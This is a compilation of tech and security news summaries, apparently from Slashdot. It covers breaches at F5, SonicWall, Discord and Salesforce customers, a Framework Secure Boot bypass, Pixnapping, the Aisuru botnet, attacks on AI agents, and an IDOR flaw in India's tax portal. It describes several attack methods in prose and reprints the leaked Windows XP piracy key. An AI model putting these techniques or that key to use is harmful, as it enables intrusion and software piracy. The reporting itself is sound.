Backblaze has been tracking hard disk drive failures in its datacenter since 2013. The backup and cloud storage company's latest analysis of approximately 317,230 drives shows that peak failure rates have dropped dramatically and shifted much later in a drive's lifespan. Where the company once saw failure rates of 13.73% at around three years in 2013 and 14.24% at seven years and nine months in 2021, the current data shows a peak of just 4.25% at 10 years and three months.

This represents the first time the company has observed the highest failure rate occurring at the far end of the drive curve rather than earlier in its operational life, it said. The drives maintained relatively consistent failure rates through most of their use before spiking sharply near the end. The improvement amounts to roughly one-third of the previous peak failure rates.

An anonymous reader quotes a report from BleepingComputer: U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code. The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products. BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide. [...]

F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance. To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients. Despite any evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

Roughly 200,000 Linux-based Framework laptops shipped with a signed UEFI shell command (mm) that can be abused to bypass Secure Boot protections -- allowing attackers to load persistent bootkits like BlackLotus or HybridPetya. Framework has begun patching affected models, though some fixes and DBX updates are still pending. BleepingComputer reports: According to firmware security company Eclypsium, the problem stems from including a 'memory modify' (mm) command in legitimately signed UEFI shells that Framework shipped with its systems. The command provides direct read/write access to system memory and is intended for low-level diagnostics and firmware debugging. However, it can also be leveraged to break the Secure Boot trust chain by targeting the gSecurity2 variable, a critical component in the process of verifying the signatures of UEFI modules.

The mm command can be abused to overwrite gSecurity2 with NULL, effectively disabling signature verification. "This command writes zeros to the memory location containing the security handler pointer, effectively disabling signature verification for all subsequent module loads." The researchers also note that the attack can be automated via startup scripts to persist across reboots.

Longtime Slashdot reader Gadi Evron writes: Bruce Schneier and Barath Raghavan say agentic AI is already broken at the core. In their IEEE Security & Privacy essay, they argue that AI agents run on untrusted data, use unverified tools, and make decisions in hostile environments. Every part of the OODA loop (observe, orient, decide, act) is open to attack. Prompt injection, data poisoning, and tool misuse corrupt the system from the inside. The model's strength, treating all input as equal, also makes it exploitable. They call this the AI security trilemma: fast, smart, or secure. Pick two. Integrity isn't a feature you bolt on later. It has to be built in from the start. "Computer security has evolved over the decades," the authors wrote. "We addressed availability despite failures through replication and decentralization. We addressed confidentiality despite breaches using authenticated encryption. Now we need to address integrity despite corruption."

"Trustworthy AI agents require integrity because we can't build reliable systems on unreliable foundations. The question isn't whether we can add integrity to AI but whether the architecture permits integrity at all."

An anonymous reader shares a report: China's expansion of its rare earth export controls appeared to mark another escalation in the US-China trade war last week. But the announcements were also significant in another way: unusually, the documents could not be opened using American word processing software.

For the first time, China's Ministry of Commerce issued a slew of documents that could be directly accessed only through WPS Office -- China's answer to Microsoft Office -- as Beijing continues its tech self-reliance drive. Developed by the Beijing-based software company Kingsoft, WPS Office uses a different coding structure to Microsoft Office, meaning WPS text files cannot be opened directly in Word without conversion. Previously, the ministry primarily released text documents in Microsoft Word format.

schwit1 shares a report from Hackread: On October 3, 2025, Hackread.com published an in-depth report in which hackers claimed to have stolen 989 million records from 39 major companies worldwide by exploiting a Salesforce vulnerability. The group demanded that Salesforce and the affected firms enter negotiations before October 10, 2025, warning that if their demands were ignored, they would release the entire dataset. The hackers, identifying themselves as "Scattered Lapsus$ Hunters," a collective said to combine elements of Scattered Spider, Lapsus$, and ShinyHunters, have now published data allegedly belonging to 6 of the 39 targeted companies.

The companies named in the leak are as follows: Fujifilm, GAP, INC., Vietnam Airlines, Engie Resources, Quantas Airways Limited, and Albertsons Companies, Inc. In all 6 leaks, the record contains personal details of customers, business, including email addresses, full names, addresses, passport numbers, phone numbers. The hackers said on Telegram that they will not be releasing any additional information, stating, "A lot of people are asking what else will be leaked. Nothing else will be leaked. Everything that was leaked was leaked, we have nothing else to leak, and obviously, the things we have cannot be leaked for obvious reasons."

An anonymous reader quotes a report from The Register: Security researchers have resurrected a 12-year-old data-stealing attack on web browsers to pilfer sensitive info from Android devices. The attack, dubbed Pixnapping, has yet to be mitigated. Conceptually, it's the equivalent of a malicious Android app being able to screenshot other apps or websites. It allows a malicious Android application to access and leak information displayed in other Android apps or on websites. It can, for example, steal data displayed in apps like Google Maps, Signal, and Venmo, as well as from websites like Gmail (mail.google.com). It can even steal 2FA codes from Google Authenticator.

"First, the malicious app opens the target app (e.g., Google Authenticator), submitting its pixels for rendering," explained [Alan Wang, a PhD candidate at UC Berkeley]. "Second, the malicious app picks the coordinates of a target pixel whose color it wants to steal. Suppose for example it wants to steal a pixel that is part of the screen region where a 2FA character is known to be rendered by Google Authenticator, and that this pixel is either white (if nothing was rendered there) or non-white (if part of a 2FA digit was rendered there). Third, the malicious app causes some graphical operations whose rendering time is long if the target pixel is non-white and short if it is white. The malicious app does this by opening some malicious activities (i.e., windows) in front of the target app. Finally, the malicious app measures the rendering time per frame of the above graphical operations to determine whether the target pixel was white or non-white. These last few steps are repeated for as many pixels as needed to run OCR over the recovered pixels and guess the original content."

The researchers have demonstrated Pixnapping on five devices running Android versions 13 to 16 (up until build id BP3A.250905.014): Google Pixel 6, Google Pixel 7, Google Pixel 8, Google Pixel 9, and Samsung Galaxy S25. Android 16 is the latest operating system version. Other Android devices have not been tested, but the mechanism that allows the attack to work is typically available. A malicious Android app implementing Pixnapping would not require any special permissions in its manifest file, the authors say. The researchers detail the attack in a paper (PDF) titled "Pixnapping: Bringing Pixel Stealing out of the Stone Age."

Slashdot reader joshuark shared this report from Fast Company: According to Monster's newly released 2025 Mental Health in the Workplace survey of 1,100 workers, 80% of respondents described their workplace environment as toxic. The alarming statistic is an increase from 67% just a year ago.

The challenging environment has major implications. An astonishing 71% of workers say their mental health is poor (40%) or fair (31%), while only 29% rank it positively: 20% said it was good and 9% described it as great. Workers say that a toxic workplace culture is the top cause of their poor mental health (59%), followed closely by having a bad manager (54%)...

Mental health is incredibly important to employees. The majority (63%) care more about it than having a "brag-worthy" job. Likewise, many would pass on a promotion (43%) or opt out of a raise (33%) if it was better for their mental health... The vast majority (93%) say their employer isn't focused on supporting employee mental health — a statistic that rose drastically since just a year ago, with 78% claiming the same.
"According to the survey, more than half of workers (57%) say they'd rather quit their job than continue working in an environment they feel is toxic and overall, causing major strains to their mental wellbeing..."

The Register reports: Over the past two years, the open source curl project has been flooded with bogus bug reports generated by AI models. The deluge prompted project maintainer Daniel Stenberg to publish several blog posts about the issue in an effort to convince bug bounty hunters to show some restraint and not waste contributors' time with invalid issues. Shoddy AI-generated bug reports have been a problem not just for curl, but also for the Python community, Open Collective, and the Mesa Project.

It turns out the problem is people rather than technology. Last month, the curl project received dozens of potential issues from Joshua Rogers, a security researcher based in Poland. Rogers identified assorted bugs and vulnerabilities with the help of various AI scanning tools. And his reports were not only valid but appreciated. Stenberg in a Mastodon post last month remarked, "Actually truly awesome findings." In his mailing list update last week, Stenberg said, "most of them were tiny mistakes and nits in ordinary static code analyzer style, but they were still mistakes that we are better off having addressed. Several of the found issues were quite impressive findings...."

Stenberg told The Register that about 50 bugfixes based on Rogers' reports have been merged. "In my view, this list of issues achieved with the help of AI tooling shows that AI can be used for good," he said in an email. "Powerful tools in the hand of a clever human is certainly a good combination. It always was...!" Rogers wrote up a summary of the AI vulnerability scanning tools he tested. He concluded that these tools — Almanax, Corgea, ZeroPath, Gecko, and Amplify — are capable of finding real vulnerabilities in complex code.
The Register's conclusion? AI tools "when applied with human intelligence by someone with meaningful domain experience, can be quite helpful."

jantangring (Slashdot reader #79,804) has published an article on Stenberg's new position, including recently published comments from Stenberg that "It really looks like these new tools are finding problems that none of the old, established tools detect."

Cryptologist/CS professor Daniel J. Bernstein is alleging that America's National Security Agency is attempting to influence NIST post-quantum cryptography standards.

Bernstein first emphasizes that it's normal for post-quantum cryptography (or "PQ") to be part of "hybrid" security that also includes traditional pre-quantum cryptography. (Bernstein says this is important because since 2016, "We've seen many breaks of post-quantum proposals...")

"The problem in a nutshell. Surveillance agency NSA and its [UK counterpart] GCHQ are trying to have standards-development organizations endorse weakening [pre-quantum] ECC+PQ down to just PQ." Part of this is that NSA and GCHQ have been endlessly repeating arguments that this weakening is a good thing... I'm instead looking at how easy it is for NSA to simply spend money to corrupt the standardization process.... The massive U.S. military budget now publicly requires cryptographic "components" to have NSA approval... In June 2024, NSA's William Layton wrote that "we do not anticipate supporting hybrid in national security systems"...

[Later a Cisco employee wrote of selling non-hybrid cryptography to a significant customer, "that's what they're willing to buy. Hence, Cisco will implement it".]

What do you do with your control over the U.S. military budget? That's another opportunity to "shape the worldwide commercial cryptography marketplace". You can tell people that you won't authorize purchasing double encryption. You can even follow through on having the military publicly purchase single encryption. Meanwhile you quietly spend a negligible amount of money on an independent encryption layer to protect the data that you care about, so you're actually using double encryption.
This seems to be a speculative scenario. But Bernstein is also concerned about how the Internet Engineering Task Force handled two drafts specifying post-quantum encryption mechanisms for TLS ("the security layer inside HTTPS and inside various other protocols"). For a draft suggesting "non-hybrid" encryption, there were 20 statements of support (plus 2 more only conditionally supporting it), but 7 more statements unequivocally opposing adoption, including one from Bernstein. The IETF has at times said they aim for "rough consensus" — or for "broad consensus" — but Bernstein insists 7 opposers in a field of 29 (24.13%) can't be said to match the legal definition of consensus (which is "general agreement"). "I've filed a formal complaint regarding the claim of consensus to adopt."

He's also written a second blog post analyzing the IETF's decision-making process in detail. "It's already bad that the IETF TLS working group adopted non-hybrid post-quantum encryption without official answers to the objections that were raised. It's much worse if the objections can't be raised in the first place."

Thanks to alanw (Slashdot reader #1,822) for spotting the blog posts.

An anonymous reader quotes a report from KrebsOnSecurity: The world's largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet's attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide. The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru's owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru's size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google's DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps. By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets each second at a targeted host. Hardly anyone noticed because it appears to have been a brief test or demonstration of Aisuru's capabilities: The traffic flood lasted less only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

Aisuru's overlords aren't just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption. For the past several weeks, ISPs hosting some of the Internet's top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

An anonymous reader quotes a report from CSO Online: On Sept. 17, security vendor SonicWall announced that cybercriminals had stolen backup files configured for cloud backup. At the time, the company claimed the incident was limited to "less than five percent" of its customers. Now, the firewall provider has admitted that "all customers" using the MySonicWall cloud backup feature were affected. According to the company, the stolen files contain encrypted credentials and configuration data. "[W]hile encryption remains in place, possession of these files could increase the risk of targeted attacks," SonicWall warns in its press release.

Security specialist Arctic Wolf also warns of the consequences of the incident. "Firewall configuration files store sensitive information that can be leveraged by threat actors to exploit and gain access to an organization's network," explains Stefan Hostetler, threat intelligence researcher at Arctic Wolf. "These files can provide threat actors with critical information such as user, group, and domain settings, DNS and log settings, and certificates," he adds. Arctic Wolf has previously observed threat actors, including nation-state and ransomware groups, exfiltrating firewall configuration files to use for future attacks. SonicWall urges all customers and partners to regularly check their devices for updates. Admins can find additional information here.

smooth wombat writes: At one point in technology history, floppy disks reigned supreme. Files, pictures, games, everything was put on a floppy disk. But technology doesn't stand still and as time went on disks were replaced by CDs, DVDs, thumb drives, and now cloud storage. Despite these changes, floppy disks are still found in long forgotten corners of businesses or stuffed in boxs in the attic. What is on these disks is anyone's guess, but Cambridge University Library is racing against time to preserve the data. However, lack of hardware and software to read the disks, if they're readable at all, poses unique challenges.

Some of the world's most treasured documents can be found deep in the archives of Cambridge University Library. There are letters from Sir Isaac Newton, notebooks belonging to Charles Darwin, rare Islamic texts and the Nash Papyrus -- fragments of a sheet from 200BC containing the Ten Commandments written in Hebrew.

These rare, and often unique, manuscripts are safely stored in climate-controlled environments while staff tenderly care for them to prevent the delicate pages from crumbling and ink from flaking away.

But when the library received 113 boxes of papers and mementoes from the office of physicist Stephen Hawking, it found itself with an unusual challenge. Tucked alongside the letters, photographs and thousands of pages relating to Hawking's work on theoretical physics, were items now not commonly seen in modern offices -- floppy disks.

They were the result of Hawking's early adoption of the personal computer, which he was able to use despite having a form of motor neurone disease known as amyotrophic lateral sclerosis, thanks to modifications and software. Locked inside these disks could be all kinds of forgotten information or previously unknown insights into the scientists' life. The archivists' minds boggled.

These disks are now part of a project at Cambridge University Library to rescue hidden knowledge trapped on floppy disks. The Future Nostalgia project reflects a larger trend in the information flooding into archives and libraries around the world.

Google is introducing a new Chrome browser feature for Android and desktop users that automatically turns off notifications for websites that you're already ignoring. From a report: Chrome's Safety Check feature already provides similar functionality for camera access and location tracking permissions.

This new auto-revocation feature builds on a similar Android feature that already makes it easier for Chrome users to unsubscribe from website notifications they don't care about with a single tap. The feature doesn't revoke notifications for any web apps installed on the device, and permissions will only be disabled for sites that send a lot of notifications that users rarely engage with. Less than one percent of all web notifications in Chrome currently receive any interaction from users, according to Google, often making them more distracting than helpful.

Apple is updating its Security Bounty program this November to offer some of the highest rewards in the industry. From a report: It has doubled its top award from $1 million to $2 million for the discovery of "exploit chains that can achieve similar goals as sophisticated mercenary spyware attacks" and which requires no user interaction. But the maximum possible payout can exceed $5 million dollars for the discovery of more critical vulnerabilities, such as bugs in beta software and Lockdown Mode bypasses. Lockdown Mode is an upgraded security architecture in the Safari browser.

In addition, the company is rewarding the discovery of exploit chains with one-click user interaction with up to $1 million instead of just $250,000. The reward for attacks requiring physical proximity to devices can now also go up to $1 million, up from $250,000, while the maximum reward for attacks requiring physical access to locked devices has been doubled to $500,000. Finally, researchers "who demonstrate chaining WebContent code execution with a sandbox escape can receive up to $300,000."

An anonymous reader shares a report: Poland's critical infrastructure has been subject to a growing number of cyberattacks by Russia, whose military intelligence, has trebled its resources for such action against Poland this year, the country's digital affairs minister told Reuters. Of the 170,000 cyber incidents that have been identified in the first three quarters of this year, a significant portion has been attributed to Russian actors, while other cases are financially motivated, involving theft or other forms of cybercrime, Krzysztof Gawkowski said.

He said Poland is a subject to between 2,000 and 4,000 incidents a day and that 700 to 1,000 are "taken up by us, meaning they posed a real threat or had the potential to cause serious problems," he said. Foreign adversaries are now expanding their focus beyond water and sewage systems to the energy sector, he said.

Dave W. Plummer, the Microsoft developer who created Task Manager and helped build Windows Product Activation, has revealed the origins of Windows XP's most notorious product key. The alphanumeric string FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8 was not cracked through clever hacking but leaked as a legitimate volume licensing key five weeks before XP's October 2001 release.

A warez group distributed the key alongside special corporate installation media. Windows Product Activation generated hardware IDs from system components and sent them to Microsoft for validation. The leaked volume licensing key bypassed this entirely. The system recognized it as corporate licensing and skipped phone-home activation. Users could install XP without activation prompts or 30-day timers. Microsoft later blacklisted the key.

An anonymous reader shares a report: A website set up by an unknown Dane over the course of one weekend in August is giving a massive headache to those trying to pass a European bill aimed at stopping child sexual abuse material from spreading online.

The website, called Fight Chat Control, was set up by Joachim, a 30-year-old software engineer living in Aalborg, Denmark. He made it after learning of a new attempt to approve a European Union proposal to fight child sexual abuse material (CSAM) -- a bill seen by privacy activists as breaking encryption and leading to mass surveillance.

The site lets visitors compile a mass email warning about the bill and send it to national government officials, members of the European Parliament and others with ease. Since launching, it has broken the inboxes of MEPs and caused a stir in Brussels' corridors of power. "We are getting hundreds per day about it," said Evin Incir, a Swedish Socialists and Democrats MEP, of the email deluge.

An anonymous reader quotes a report from The Verge: Discord has identified approximately 70,000 users that may have had their government ID photos exposed as part of a customer service data breach announced last week, spokesperson Nu Wexler tells The Verge. A tweet by vx-underground said that the company was being extorted over a breach of its Zendesk instance by a group claiming to have "1.5TB of age verification related photos. 2,185,151 photos." In its announcement last week, Discord said that information like names, usernames, emails, the last four digits of credit cards, and IP addresses also may have been impacted by the breach. "All affected users globally have been contacted and we continue to work closely with law enforcement, data protection authorities, and external security experts," said Wexler. "We've secured the affected systems and ended work with the compromised vendor. We take our responsibility to protect your personal data seriously and understand the concern this may cause."

An anonymous reader quotes a report from The Register: London cops on Tuesday arrested two teenagers on suspicion of computer misuse and blackmail following a ransomware attack on a chain of London preschools. London's Metropolitan Police said the two men, both aged 17, were taken into custody during an operation at residential properties in Bishop's Stortford, Hertfordshire. The arrests followed a September 25 referral from the UK's Action Fraud reporting center detailing a ransomware attack on the preschools. While the Met police didn't name the schools, the timing of the referral coincides with a digital break-in at Kido International, a preschool and daycare organization that operates in the UK, US, and India.

In a very aggressive -- and disgusting -- attempt to extort a ransom payment from Kido, the criminals published profiles of 10 children, including photos, names, and home addresses, along with their parents' contact details and in some cases places of work, threatening to expose more if the ransom demand wasn't met. A new crime crew calling itself the Radiant Group claimed responsibility for the attack, and posted the preschool's name, along with its pupils' profiles, as the first leak on its dark web site. The ransomware gang later deleted the kids' and parents' data, apparently under pressure from other criminals -- but not before some of the parents reported receiving threatening calls.

Salesforce says it's refusing to pay an extortion demand made by a crime syndicate that claims to have stolen roughly 1 billion records from dozens of Salesforce customers. From a report: The threat group making the demands began their campaign in May, when they made voice calls to organizations storing data on the Salesforce platform, Google-owned Mandiant said in June. The English-speaking callers would provide a pretense that necessitated the target connect an attacker-controlled app to their Salesforce portal. Amazingly -- but not surprisingly -- many of the people who received the calls complied.

[...] Earlier this month, the group created a website that named Toyota, FedEx, and 37 other Salesforce customers whose data was stolen in the campaign. In all, the number of records recovered, Scattered LAPSUS$ Hunters claimed, was "989.45m/~1B+." The site called on Salesforce to begin negotiations for a ransom amount "or all your customers [sic] data will be leaked." The site went on to say: "Nobody else will have to pay us, if you pay, Salesforce, Inc." The site said the deadline for payment was Friday.

An anonymous reader shares a report: In another loss for early smart home adopters, Logitech has announced that it will brick all Pop switches on October 15.

In August of 2016, Logitech launched Pop switches, which provide quick access to a range of smart home actions, including third-party gadgets. For example, people could set their Pop buttons to launch Philips Hue or Insteon lighting presets, play a playlist from their Sonos speaker, or control Lutron smart blinds. Each button could store three actions, worked by identifying smart home devices on a shared Wi-Fi network, and was controllable via a dedicated Android or iOS app. The Pop Home Switch Starter Pack launched at $100, and individual Pop Add-on Home Switches debuted at $40 each.

A company spokesperson told Ars Technica that Logitech informed customers on September 29 that their Pop switches would soon become e-waste.

Synology has released an update to its Disk Station Manager software that removes verified drive requirements from its 2025 model-year Plus, Value and J-series DiskStation network-attached storage devices. The change allows users to install non-validated third-party drives and create storage pools without restrictions.

The company had expanded its verified drive policy to the entire Plus line a few months earlier. Synology-branded drives carried substantial price premiums over commodity hardware. The HAT5310 enterprise SATA drive costs $299 for 8TB compared to $220 for an identically sized Seagate Exos disk. Users who installed non-verified drives in affected models faced reduced functionality and persistent warning messages in the DSM interface.

Synology said today it is collaborating with third-party drive manufacturers to accelerate testing and verification of additional storage drives. Pool and cache creation on M.2 disks still requires drives from the hardware compatibility list. Synology did not clarify whether the policy change applies to previous-generation products.

A now-fixed security flaw in India's income tax e-filing portal exposed millions of taxpayers' personal and financial data due to a basic IDOR vulnerability that let users view others' records by swapping PAN numbers. "The exposed data included full names, home addresses, email addresses, dates of birth, phone numbers, and bank account details of people who pay taxes on their income in India," reports TechCrunch. "The data also exposed citizens' Aadhaar number, a unique government-issued identifier used as proof of identity and for accessing government services." From the report: The researchers found that when they signed into the portal using their Permanent Account Number (PAN), an official document issued by the Indian income tax department, they could view anyone else's sensitive financial data by swapping out their PAN for another PAN in the network request as the web page loads. This could be done using publicly available tools like Postman or Burp Suite (or using the web browser's in-built developer tools) and with knowledge of someone else's PAN, the researchers told TechCrunch.

The bug was exploitable by anyone who was logged-in to the tax portal because the Indian income tax department's back-end servers were not properly checking who was allowed to access a person's sensitive data. This class of vulnerability is known as an insecure direct object reference, or IDOR, a common and simple flaw that governments have warned is easy to exploit and can result in large-scale data breaches.

"This is an extremely low-hanging thing, but one that has a very severe consequence," the researchers told TechCrunch. In addition to the data of individuals, the researchers said that the bug also exposed data associated with companies who were registered with the e-Filing portal. [...] It remains unclear how long the vulnerability has existed or whether any malicious actors have accessed the exposed data.